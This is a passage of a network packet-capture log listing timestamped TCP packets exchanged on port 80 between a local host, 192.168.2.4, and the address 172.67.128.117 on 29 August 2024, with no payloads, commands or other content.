                                  Aug 29, 2024 23:42:08.284679890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284692049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284693003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284703970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284715891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284722090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284735918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284754992 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284914017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284924030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284933090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284941912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284953117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284962893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284967899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284971952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.284981012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.284993887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285015106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285111904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285121918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285131931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285141945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285151005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285159111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285161972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285172939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285182953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285187960 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285202980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285237074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285423994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285434961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285444021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285454035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285471916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285484076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285510063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285614967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285624981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285634995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285644054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285654068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285662889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285665989 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285674095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285684109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285693884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285695076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285705090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285706997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285718918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285725117 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285728931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285738945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285749912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285774946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285785913 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285948038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.285990953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.285995007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286035061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286150932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286163092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286173105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286183119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286201954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286201954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286231995 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286314011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286323071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286328077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286360979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286371946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286402941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286415100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286423922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286448956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286473036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286544085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286554098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286562920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286592960 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286619902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286643028 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286653996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286663055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286670923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286680937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286694050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286698103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286709070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286715984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286719084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286731005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286737919 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286747932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286757946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286763906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286767960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286778927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286782980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286791086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286799908 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286803007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.286824942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.286847115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.370600939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.370640039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.370683908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.370744944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.370757103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.370769024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.370794058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.370807886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.370820045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.370831013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.370879889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.371392012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.371433020 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.371442080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.371469021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.371486902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.371488094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.371499062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.371503115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.371526957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.371541023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.371545076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.371556997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.371593952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372064114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372073889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372085094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372121096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372132063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372214079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372225046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372234106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372245073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372256994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372265100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372268915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372293949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372308016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372335911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372347116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372358084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372369051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372374058 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372383118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372394085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.372402906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372426033 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.372436047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373308897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373327971 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373366117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373368979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373406887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373440027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373451948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373464108 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373495102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373505116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373516083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373521090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373548985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373562098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373588085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373600006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373609066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373682022 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373694897 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373706102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373722076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373739958 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373750925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373765945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373770952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373846054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373848915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373857975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373868942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373879910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373895884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.373903990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373924017 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.373963118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374002934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374013901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374023914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374034882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374046087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374058008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374068975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374092102 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374105930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374293089 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374308109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374349117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374351978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374361992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374376059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374387026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374538898 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374547005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374557972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374567032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374660015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374726057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374737978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374747992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374758959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374769926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374782085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374793053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374804020 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374850988 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374866962 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.374876976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374887943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374897957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374908924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.374972105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375010967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375022888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375031948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375042915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375052929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375063896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375076056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375087023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375089884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375103951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375111103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375117064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375123978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375128984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375140905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375149965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375152111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375165939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375166893 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375178099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375185013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375204086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375211000 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375216961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375224113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375230074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375240088 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375251055 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375272989 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375289917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375300884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375312090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375322104 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375333071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375369072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375387907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375392914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375402927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375412941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375484943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375488043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375497103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375508070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375525951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375536919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375597000 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375670910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375686884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375696898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375709057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375727892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375740051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375752926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375763893 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.375775099 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375786066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.375811100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460031033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460187912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460199118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460211992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460222960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460233927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460244894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460256100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460386038 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460386038 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460745096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460761070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460784912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460808039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460822105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460832119 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460835934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460863113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460874081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460908890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460920095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460932016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460942984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.460947037 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460978985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.460993052 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461042881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461093903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461103916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461128950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461133957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461139917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461152077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461158991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461169958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461174011 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461191893 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461210966 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461213112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461225033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461256981 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461268902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461287022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461296082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461309910 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461339951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461340904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461355925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461368084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461385012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461411953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461869955 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461915970 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461924076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.461970091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.461976051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.462022066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.462028027 CEST8049730172.67.128.117192.168.2.4
